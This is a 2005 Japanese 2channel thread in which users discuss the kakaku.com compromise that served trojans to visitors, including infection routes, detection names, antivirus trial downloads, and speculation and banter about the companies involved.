普段はIP制限かけているのに、GWということで自宅からもメンテ出来るようにIP制限外して
元に戻すの忘れていたりとか。明日は我が身、俺も今一度確認しておこう・・・。

268 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:05:39
VirusChaserは反応してくれないのか。
NODと同じエンジン使ってんじゃなかったっけ?

269 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:06:58
鯖落ち  ウイルス祭   会社批判    仮復旧     鯖落ち    あぼーん
 ┝━━━━━┿━━━━━┿━━━━━┿━━━━━┿━━━━━┥
   ∩___∩   /)
   | ノ      ヽ  ( i )))
  /  ●   ● | / /
  |    ( _●_)  |ノ /
 彡、    |∪|    ,/    いまここクマ――!!
  /_ _ヽノ     /´
 (___)     /


270 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:09:31
これって、見た側はどういった経路で感染するんだ?
javascriptとかActiveXが関係するのか?
何もせずに感染するなら、その仕組みが問題だと思うんだが。

271 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:09:40
>>269
おいおい、あぼーんしたら困るよあぼーんしたら。

272 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:09:40
>>259
情報ありがとうございます、即
載せます。

273 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:10:15
>>261
試してみた。つうか追試した。本当っぽい。
反日が絡んでる可能性はある。

先月からVIPPERが中国の反日ハカー(いわゆる紅客・黒客)のサイトを
壊滅状態に追いやってたりしてたから、反撃が始まっているのかも。

274 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:10:22
>>264
vectorからDL
http://www.vector.co.jp/soft/dl/win95/util/se288813.html

体験版シリアルは価格ドットコムで・・・
http://www.kakaku.com/


275 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:10:28
利用者の安全を無視して何日も危険な状態でサイト運営。
酷い企業だな。

276 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:11:19
>>270
Javascriptのセキュリティホールで感染する。XPのSP2の最新状態にしてもダメとの報告あり。
唯一防げたのが、NOD32だけ。

277 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:12:44
>>274
この期に及んで5/31まで期限付き尻を用意ってのがユーザーを馬鹿にしてるよな

278 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:12:45
しかし、これはNOD32の売り上げが万の単位で殺到するだろうな。
キャノン株買いか?

279 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:13:11
>XPのSP2の最新状態にしてもダメとの報告あり。

ソースは?

280 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:13:13
>>276
サンクスそうですか。

281 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:14:55
ハァハァ・・・
http://www.geocities.jp/llvlo_olvll/IMGP0043.JPG

282 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:14:57
http://www.kakaku.com/
> ※キヤノンシステムソリューションズ(株)の協力により、体験版ファイルの当社サイトからのダウンロードが可能となりました。
> NOD32アンチウイルス体験版ダウンロード(Windowsユーザーのみ)

だそうで、http://www.kakaku.com/nod32j5.exe がダウンロードできるようになってる
けど、このファイルが偽にすり替えられてたら怖い。

283 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:15:38
普段から画像だけONでJavaもJavascriptもActiveXも切ってた俺は勝ち組。

284 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:16:46
画像も表示してない俺はさらに勝ち組

285 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:17:27
価格ドットコム見てるようじゃ負け組み(貧乏人)(w

286 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:17:31
>>281
指紋ベタベタ・・・

287 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:17:31
>>281
は勝ち組!

288 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:17:32
>>282
220 名前:名無しさん@5周年[sage] 投稿日:2005/05/16(月) 12:47:18 ID:eDYUgkJ2
価格.comからダウンロードしようとしてる奴
素直にベクター(http://www.vector.co.jp/soft/win95/util/se288813.html)にまわってやれ
鯖がかわいそうでかわいそうで泣けてくる


289 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:17:38
★★★★★★★★★★★★★★★★★★★★
現状の最善な対処法。

・ノートンなどと併用しても問題ないBitDefender Free Editionを導入
http://www.altech-ads.com/product/10000839.htm
・パターンファイル更新後、全スキャン。

・ウイルスを発見したら削除
今回問題のウイルスの名称は (BehavesLike:Win32.AV-Killer)

・常設機能が切れる頃には、ノートンやバスターが対処していると
 思われるので、BitDefender Free Editionアンインストール。
★★★★★★★★★★★★★★★★★★★★

これで問題なし。

※価格コムが推奨しているNOD32について
 
 NOD32はノートンやバスターなどの他のアンチウイルスとの併用が
 出来ません。説明書で他のアンチウイルスソフトウェアをアンイストール
 してからインストールするように間いてあります。併用すると不具合
 発生の危険あり。


290 :お前ら、デジタル署名確認してますか?:2005/05/16(月) 13:17:48
>>282
デジタル署名が付いているので、それを確認してから実行すれ。

291 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:17:59
>>282
もう少し詳しい手順を別ページにでも用意すべきだと思わないか?
恐らくkakaku.comのビジターの中にはかなりの素人ユーザーも含まれてるだろ。

292 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:18:15
>>282
ベクターからも落とせるよ
ついでにApacheに変わってるらしいから
もうハックされないかと

293 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:18:56
価格コムの計画倒産の疑いはないのか?

294 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:20:11
>>293
一応当初スケジュールでは明日5/17に3月期決算の発表予定だったんだが…

295 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:20:34



とりあえずベクターからNOD32拾え!







296 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:20:54
うーむ今日は正しく魔の月曜日。
価格コムへのサイバーテロによる被害拡大









そして…笑ってもいいともの「ワンコウンコする事件」




ぬぉおおおおおおおお!ブラックマンデェェェェェェェェ〜!!!

297 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:21:53
>>283
いや、完全に負け組み
JavaScriptとVBScriptの実行のみ無効にすればそれでいい
Appletの実行も当然無効にする

298 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:22:09
>>296
なんかあったの?
会社にいるからわかんない。

299 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:22:26
決算発表したくなかったんだろ。

300 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:22:52
>>281
再うp

301 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:23:28
>>300
ん?
見れないか?

302 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:23:58
>>294
タイミング良すぎだな

303 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:26:12
計画倒産くせーーーーーー

304 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:26:43
>>289=N速+の 5oc9ocYh =キチガイ罵倒+妄想宣伝野郎

305 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:27:32
BitDefender(常駐版)でチェックできた人がいたら情報お願いします。

Free版は常駐監視しないので、買う目安になります。


306 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:27:34
そもそも放置して被害を拡大すること自体不自然だ。

307 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:27:43
>>303
債務超過だとして、ここって支出は何があるの?
鯖代ぐらいじゃないの?メンテもたいしてしてないみたいだし。

308 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:30:08
>>298
>>296ではないがいいとも本番中にきゃわいい子犬がンコ ムリムリとしてたw

309 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:30:23
取りあえず11(水)〜13日(金)までは踏んでなくて14日(土)以降に踏んだ奴はセーフだな。

>不正アクセスは、11日に発覚。カカクコムを経由してウイルスを無差別に送りつけている
>ことが分かった。これを受け監視体制を強化し、プログラム改ざんへの対策や、犯人の
>調査を継続したが、不正アクセスが止まらなかったため14日にサイトを閉鎖した。

310 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:31:21
>>259
NOD32の英語体験版でもインスコ後に再起動すると
勝手にアップデートしてメッセージが出たよ。
ウィンドウ右下のとこに20050515という日付が出るみたいだし
css踏んだらちゃんと検出したんだが。
まぁバスターとか入れてるなら競合するそうだから
bitdefender使えばいいし、別にどうでもいいけれども。

311 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:31:25
対策らしい対策といえるようなもの、本当になんかやったのか?

312 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:31:52
しかし酷い事件だこりゃ
攻撃してる奴らも酷いな

313 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:32:08
セキュリティ関係は例の避難所でやった方がバカがいなくてすっきりするかも

314 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:33:35
>>309
11日にHDDレコ買って、その後毎日チェックしてたけど、感染してなかった。

315 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:33:43
この改ざんにより価格.comのサイトから利用者に無差別にウイルスソフトが送りつけられた可能性があるほか、価格.comが保有するメールアドレスが閲覧された形跡もあるということです。
                                                              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

316 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:33:51
>>309
不正アクセスが「発覚」したのが11日なので、それ以前に不正アクセスがあった可能性あるんでは?

317 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:34:22
>>309
>これを受け監視体制を強化し、プログラム改ざんへの対策や、犯人の
>調査を継続したが、

これって故意に放置して犯人を釣ろうとしたのだろ
で、結局釣れずにその間に被害がどんどん広がっていったと・・・


318 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:34:25
>>303

ぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇぇ

319 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:37:10
■暫定まとめサイト

価格.comがクラッキングで一時閉鎖、閲覧ユーザーはウイルス感染も(´・ω・)
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm

■価格.com(http://kakaku.com/)より抜粋

>NOD32アンチウイルス体験版ダウンロード(Windowsユーザーのみ)
>http://kakaku.com/nod32j5.exe
>
>セットアップマニュアル(PDF)
>http://kakaku.com/nod32trial_man.pdf
>
>体験版ファイルをダウンロードし、セットアップマニュアルに従ってインストールしてください。
>ユーザー名、パスワードには、下記をご入力ください。
>ユーザー名:AV-2544986
>パスワード:viu9hcphek
>
>[有効期限2005年5月31日まで]

■もし上からNOD32をダウンロードできなかったらこちらでもいいかも

NOD32アンチウイルス ダウンロード標準版
http://www.vector.co.jp/soft/win95/util/se288813.html

320 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:37:32
>>305
ノートンやバスターが対応する頃までは常駐機能効いていると思いますよ。
常駐が切れたその後はフリーのまま、自動アップデートで使えますよ。
海外ではノートンが対処してないウイルスにも対処する無料ソフトして
重宝されていますよ。
今回のもノートンは駄目だがBitDefenderは検出したということで
既に5/8の時点で報告されています。

BehavesLike:Win32.AV-Killerでぐぐってみてね。

321 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:41:56
>>320
http://ringonoki.net/tool/antiv/bitdef.html
>林檎の木調べのウィルス検出力調査では、フリーウェア部門で検出力、堂々のフリー部門2位

1位は?

322 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:41:57
ノートンを使う理由が完全になくなってしまった。

323 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:43:07
>>322
一生NOD使ってろ

324 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:43:18
>>322
これで2ちゃんでのノートン伝説も終演を迎えるなw

これからはNOD32伝説が始まる!

325 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:44:08
>>323
 ↑
負け犬シマンテック社員w

326 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:44:28
http://www.microsoft.com/japan/security/incident/download_ject.mspx
どうせ、またこの脆弱性経由でのインストールだろう?
問題はインストールされたトロイがセキュリティソフトで検出されないのか?
まあ、どうでもいいけどよお!

327 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:46:44
ソフトメーカー営業マン、工作に必死だなワロス

328 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:49:18
http://pc8.2ch.net/test/read.cgi/sec/1115806118/178-188
ノートン未対応の例はいっぱいあるわな

329 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:49:24
本日の行動計画をすべてキャンセルして
ウイルスチェック中だが

\Temporary Internet Files\Content.IE5\C3CL4ZCR\a02[1].css - Win32/PSW.Delf.FZ トロイ

ウヒョー出てきやがった

330 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:49:30
とりあえず、対策としては
NIS入れてる素人たちはネットに繋ぐなということ?

331 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:50:53
>>329
ん?それだと一時キャッシュ消せば何の問題もないね。NOD入れるまでもないな

332 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:52:43
a scuared 2でスキャンしたら9個もひっかかったけど今回の件とは無関係?

333 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:54:50
で、このトロイはどんなウィルスなわけ?

334 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:56:27
実害が出た奴はいるの?

335 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:57:08

590 名前:ひろゆき@どうやら管理人 ★[] 投稿日:2005/05/16(月) 13:27:18 ID:???0 BE:176674-##
kabu.comもwindowsじゃなかったっけ?

593 名前:ひろゆき@どうやら管理人 ★[] 投稿日:2005/05/16(月) 13:30:16 ID:???0 BE:126454-##
http://toolbar.netcraft.com/site_report?url=http://www.kabu.com
やっぱりwindowsだ。

598 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:2005/05/16(月) 13:34:35 ID:0N8BIkxV0
2chもIISにしよう。うん。

603 名前:ひろゆき@どうやら管理人 ★[] 投稿日:2005/05/16(月) 13:47:08 ID:???0 BE:226894-##
IIS化のほうがもっとがんばるかも、、、

605 名前:マァヴ ◆jxAYUMI09s [sage] 投稿日:2005/05/16(月) 13:49:16 ID:pL7oudzg0 BE:6735555-#
>603
クラックされるより恐ろしい事態に・・・・(^_^;)


336 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:57:17
「trojandownloader.small.AAO」「PSW.Delf.FZ」
ってゆうか価格ドットコム
てめえのところで配布したウィルスの詳細書けよ
検索しても全然このウィルスの詳細が出てこないから
どんなウィルスかもわからね
ばら撒いたならそのくらいするのが義務だろ


337 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:58:40
最近のは知らないが
マック使ってたころはノートンにとても 世 話 に な っ た

おかげさまでウィルスにやられなくても
勝手にシステム壊してえらく不安定にさせられたっけ

シネヨ

338 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:59:15
>>336
キヤノンも繋がらんな

339 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:59:46
人柱乙

340 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:01:20
価格コムはボーリング大会に(ry

341 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:01:31
とりあえず糞重いだけで、役立たずなノートンは
窓から投げ捨てろってことか?

342 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:02:19
それはモマイのPCのスペッk(ry

343 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:04:34
結局、IISってのは社内向けか、部門別のサーバーに使うには良くても、
海千山千のヤツらがアッタックしてくる、対外サーバーには絶対にするな!でFA?

344 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:07:27
Apacheにしたとしてもクラックされる鯖はクラックされる。

345 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:08:24
ひろゆきはもっとがんばりたいから2ちゃんをIIS化しようかな、って言ってますが・・・
周りは全員止めてます
「おまえは頑張るな!」だって

346 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:10:16
脳豚重過ギ

  ε ⌒ヘ⌒ヽフ
 (   (  ・ω・) ブヒ
  しー し─J



347 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:12:33
>>346
禿しく同意。最近の先生あまりにも重いので、未だに2002年度の先生使用中。
ところで、チャーハン食いたくなってきた。

348 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:14:50
>>347
2002は軽かったね。今年の10月で更新できなくなるけどね。
あの軽さと機能のNIS2006 Lightとかでたら皆に勧めるんだが。

349 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:16:18
>>345
あなた読み違えてますよ。

350 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:18:30
アンチウイルスソフト選びも難しーね。
今回の件でNODとかBitDifenderとかKasperSkyとか日本ではマイナーなソフトが注目されてるが、
こいつらは山田とか金玉とか日本特有のウィルスには弱そうだしなぁ。

351 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:20:07
>>350
山田の亜種にはどこもついてこれてませんけどね、、、

352 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:21:26
>>348
2002もNOD32と比べたら重杉w



353 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:21:38
>>348
げげ、2002って10月までなんですか…アチャー。
前に2004買ったはいいけど、あまりの重さに2002に戻してたのに。う〜ん。
今回の件も含めて、どこのがいいのかいろいろ調べてみようかな。


354 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:22:50
キヤノン社員がここぞとばかりにがんばってますなぁ^^

355 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:24:19
>>259
>>310と同じく、NOD32英語体験版、アップデート後ちゃんと検出した。
てきとーなこと書くなよ・・・。

356 :355:2005/05/16(月) 14:26:18
>>259は 「アップデートしねーと意味ねーよ」ってことか。
スマンカッタ土下座 orz

357 :暫定まとめサイト作成中の人:2005/05/16(月) 14:26:19
>>355
申し訳ないです...

358 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:26:53
a02.css以外の別名で潜伏していたヤシいる?

359 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:27:39
糞フトの体験版はできるだけ避けたいのでシマンテック、トレンドの早急な対応を願います。

360 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:29:41
何所のメーカーでも良いからオンラインスキャン組んでくれ!

361 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:29:47
>>350
Sushi とか Tsunami みたいに、Kintama がそのまま英語になったらいやだな。

362 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:30:54
インストール不要の小さなチェックツール欲しいな。
あるいは
どのファイルがどうなってたら感染してるって説明。

NOD32インストールせいというのは不親切。


363 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:31:16
価格.comが何の対策ソフト入れてたはとりあえず知りたいね。

364 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:31:33
ネット上をパトロールして自動的にウイルスを破壊するソフト作れ

365 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:32:46
>>363
直子の代筆だろ。

366 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:32:49
それかっこいいな

367 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:32:50
>>364
それ、ウイルスだから。

368 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:33:28
Code Greenでつね...

369 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:34:37
>>367
いや、ワームだろ

370 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:35:02
>>365
女性差別・女性蔑視で通報しました

371 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:35:04
NOD
avastよりいいなコレ

・・・・
いかん
これは罠ね

372 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:35:46
http://www.itmedia.co.jp/news/articles/0505/16/news022.html
 その他のウイルス対策ソフトでの対応については、まだ確認中。
トレンドマイクロによれば「この件に関して問い合わせを受けた
ユーザーの多くで、『Troj_Delf.RM』という名称で検出されたとい
情報が入っているが、まだ確定できていない」といい、引き続き
検証を進めているという。

 14時20分追記:トレンドマイクロによると、このTrojan_Delf.RMが、
価格.comでばら撒かれたウイルスの1つであることが確認された。
パターンファイル2.631.00で対応済みだ。ほかのウイルスについては
調査を継続するという。

373 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:36:05
>>359

他社工作員必死だなw

374 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:37:24
借金の情報が集まる→金に困ってる奴の情報→オレオレ詐欺
NOD32の登録情報が集まる→セキュリティに弱い奴の情報→オレオレ詐欺


375 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:37:43
>>370
直子の代筆、ソフトでググり。

376 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:38:39
>>365
今はソーネクからでてんのかよ…

>>369
む、そういやそうだな。

377 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:39:04
>>375
そっかもうその事件も知らないのがセキュリティ板なんかにいるんだ

378 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:39:03
>>375
「直子の代筆 女性差別」でググり

379 :359:2005/05/16(月) 14:39:56
>>373
は?当然だろ?既に他社製品インスコ済みなのになんでわざわざアンインスコしてNODなんて
入れなきゃならないんだよ馬鹿。
当然の主張だと思うが?

380 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:40:13
>>378
http://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=UTF-8&rls=GGLD,GGLD:2005-19,GGLD:ja&q=%E7%9B%B4%E5%AD%90%E3%81%AE%E4%BB%A3%E7%AD%86+%E5%A5%B3%E6%80%A7%E5%B7%AE%E5%88%A5

381 :378:2005/05/16(月) 14:41:06
>>377
俺のほうが一秒早かったのに(; ゚Д゚)

382 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:41:34
>>379
じゃ、オマイはその他社製品を使い続けてたっぷり感染してろw

383 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:41:38
>>379
シマとトレの両方入れてんの?

384 :377:2005/05/16(月) 14:42:49
>>381
( ゚д゚)ポカーン

385 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:45:13
377 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/16(月) 14:39:04
378 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/16(月) 14:39:03

386 :359:2005/05/16(月) 14:45:25
>>382
少なくともNODの体験版導入する気は一切ないのでたっぷり感染させてもらいますよ。プ

387 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:47:05
>>382
おまえの頭、何かのウィルスに感染してそう
早く駆除しておけ

388 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:47:14
ごめん、365だがネタが微妙すぎてしまったような気が。
正直スマンテック…。

389 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:47:19
>>386
オマイが感染するのは勝手だがそれでウイルスをばらまくのだけはやめてくれよな

390 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:47:21
>>385
これはもうダメかもわからんね

391 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:48:02
>>390
いや、2ちゃんではたまにあることだから気にするな

392 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:48:48
>>385
1秒遅れで結婚しそこなった>>381が哀れ。

393 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:48:52
キヤノン社員が大暴れかw

394 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:49:11
しかし半日経っても、明確な解決方法が見出せないのか?


395 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:50:14
http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
ほれ 起動中のプロセスを全部調べやがれ
トロイはサーバーとして起動していなけりゃ意味がない
それよりも、ファイアーフォールソフトの方が必要なんじゃないのか?
プロセスの発信を検知出来る物な

396 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:51:19
で、このトロイの詳細情報いつ出すんだ?価格コムもキヤノンもダメダメだな・・・


397 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:51:36
いわゆるIDSってやつ?

398 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:52:16
>>393
しかし何故NOD32だと駆除できるって情報が早い段階で出てきたんだろう。
シマンテックやトレンドマイクロが未だに解明できてないのに、何故下位シェア会社が?
しかも手際よく5月末までのシリアルまで用意?

ぁゃιぃ

399 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:53:16
対策ソフトは一度も利用したことがないな。

オレのマシンはもう世界中のウイルスの巣になってるかな。ウイルス同士で戦って自滅してるかもしれないが。

最近やや重い感じはするが、それ以外には特に異常はない。

400 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:53:29
シマンテックからメール気やした!!

401 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:54:15
NortonInternetSecurityのPFWは変なプログラムがネットにアクセスしようとしたらすぐ反応
あるから分かる。

402 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:54:55
ね、今も警告gifで表示されてる?
それと、ソースみると全て文字化けしちゃってるのはうちだけ?

403 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:55:15
>>399
今すぐ回線を切ってくれ・・

404 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:55:55
>>398
だなー、あやしいよね^^

405 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:56:19
>>398
大手社員乙。

406 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:56:23
>>398
ヒューリスティックのまぐれ当たりとか。

407 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:57:03
NOD32怪しいよな。
絶対変だよ。

408 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:57:08
ていうか、
>>399みたいのを友達に持つと怖いな
巻き添えにされて情報ジャジャ漏れ

409 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:57:24
>>395
英語嫁んorz

>>396
キャノンは関係ねーかと・・・

>>401
以前NIS使いで現在NOD32使いだがNOD32のほうが反応速いかと

410 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:57:34
>>399
http://imgbbs1.artemisweb.jp/robekaru/
ほれ!

411 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:57:56
>>398
avastやzonealermは知ってても普通NODは知らないんじゃないかな?

412 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:57:56
>>398

ニュー速にコピペされてたよ


413 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:57:57
パターンファイルが、たまたま運良く対応してただけだろ。
trojandownloader.small.AAOでググっても,NODのサイトしか
ひっかからない。

414 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:58:08
たった2週間限定の糞尻有かよw


415 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:59:07
>>398
価格の中の人がNOD32使ってて検体提出したんじゃね?

416 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:59:11
>>414
2週間で終息する予定なんだろw

417 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:59:24
>>409
NODってPFW機能付いてたっけ?

418 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:59:41
>>410
ゴルァ!w

419 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:00:28
>>413
なんでまたそんな時期にそんなパターンファイルを作っていたのか?
よっぽど暇だったのか?

420 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:01:10
確かにあやしい

421 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:01:40
>>413
その名前はNODが付けたものでしょ?
だったらNODしか引っかからなくても不思議じゃないと思うけど。
VBとNAVでも名称は別だよね?

422 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:01:56
>>410
直リンかよ。

423 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:01:58
NOD32アヤスィ

424 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:02:39
NODが検出率を誇る裏に何かあるのか?

425 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:02:47
canonから落とせる奴って単にフロントエンドが日本語なだけで、
パターンファイルは本家から落としてるの?

426 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:03:01
NODが犯人か!NODが!

427 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:03:15
NHK来てる

428 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:03:17
タスクマネージャのプロセスの詳細情報が分かるソフトどうぞ
http://uechoco.s14.xrea.com/download/stm.html

429 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:03:55
>>413
そんな時期って…対応した時期などわからんよ。何千何万種のウイルスを登録
するんだから、NODがいつ該当ウイルスを登録したかなどわかるわけがない。

430 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:04:50
>>427
少なくとも2種類以上と言ってたから、これ以外もあるのでは?

431 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:05:08
>>409
じゃどのサイトでトロイの詳細情報が見れるんだ?

432 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:05:30
かなり早い段階だな。
この時点で他社にも対応確認中で一日近くかかるだろうか?



価格ドットコム我ぶっ怖れた
http://news19.2ch.net/test/read.cgi/news/1116054938/348

348 名前:七氏 投稿日:2005/05/15(日) 21:34:36 ID:QFXxzuMm0
来たメールの詳細説明PDF部分(1)
↓↓↓↓↓↓↓↓↓↓↓

こちらへの対応に関しましては下記ウイルスセキュリティソフトの最新定義ファ
イル適用にて、対応
可能な旨確認しております。
NOD32アンチウイルス http://canon-sol.jp/product/nd/index.html
その他セキュリティソフト各社にも対応を確認中であり、判明次第ご報告させて頂きます。


433 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:06:07
>>429
その必死さがあやしい

434 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:06:59
>>409
おい!NODにFW機能なんてないじゃねーかボケ!

435 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:07:08
>NOD32アンチウイルス http://canon-sol.jp/product/nd/index.html

このサイトにアクセスできないんだけど・・・・

436 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:07:24
>>421
名前が違うだけで、ウイルス本体は同じものといっていいなら
VBやNAVでも検出できるんじゃねーの?

437 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:07:38
>>409
馬鹿?

438 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:08:25
Kaspersky,F-Secure,BitDefenderでも検出するようだね。
